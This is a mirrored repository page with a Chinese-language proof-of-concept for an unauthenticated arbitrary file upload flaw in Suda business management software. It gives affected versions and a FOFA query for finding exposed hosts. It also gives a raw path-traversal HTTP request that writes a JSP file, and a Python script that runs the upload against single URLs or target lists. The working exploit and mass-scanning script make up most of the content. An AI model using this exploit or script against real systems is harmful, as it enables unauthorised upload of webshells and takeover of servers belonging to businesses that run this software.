admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/速达软件/速达软件全系产品存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

79 lines
3.0 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 速达软件全系产品存在任意文件上传漏洞
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷.
## 影响版本
```
速达A3.cloudBAS、速达A3.cloudSTD、速达A30.cloudPRO、速达3000.onlinePRO、速达A4.cloudBAS、速达A4.cloudSTD
速达A40.cloudPRO、速达4000.onlinePRO、速达A5.cloudSTD、速达A50.cloudPRO、速达A70.cloudPRO
速达5000.onlinePRO、速达7000.onlinePRO
```
## fofa
```
app="速达软件-公司产品"
```
## poc
```
POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28
<% out.print("984969719");%>
```
## 批量脚本
```python
import requests
import argparse
poc = "/report/DesignReportSave.jsp?report=../625248.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36",
"Content-Type": "application/octet-stream"
}
data = '''<% out.print("This is a page !");%>'''
def chack(url):
try:
url = "http://"+url
reps = requests.post(url=url+poc,headers=headers,data=data,verify=False,timeout=5)
shell_path = url+"/625248.jsp"
repps = requests.get(url=shell_path,headers=headers,verify=False,timeout=3)
if repps.status_code == 200:
print(f"[+] 存在速达软件存在任意文件上传 url : {shell_path}")
else:
print(f"未发现速达软件存在任意文件上传 url : {url}")
except Exception as e:
print(f"ERROR : {e}")
def main():
parser = argparse.ArgumentParser(description='速达软件全系产品存在任意文件上传')
parser.add_argument('-u', '--url', type=str, help='URL to process')
parser.add_argument('-f', '--file', type=str, help='File path to process')
args = parser.parse_args()
if args.url:
chack(args.url)
elif args.file:
with open(args.file, 'r') as file:
lines = file.readlines()
for line in lines:
chack(line.strip())
else:
print("eg : python3 速达软件全系产品存在任意文件上传.py -u http://xx.xx.x.x")
print("eg : python3 速达软件全系产品存在任意文件上传.py -f 123.txt")
if __name__ == '__main__':
main()
```
Reference in New Issue View Git Blame Copy Permalink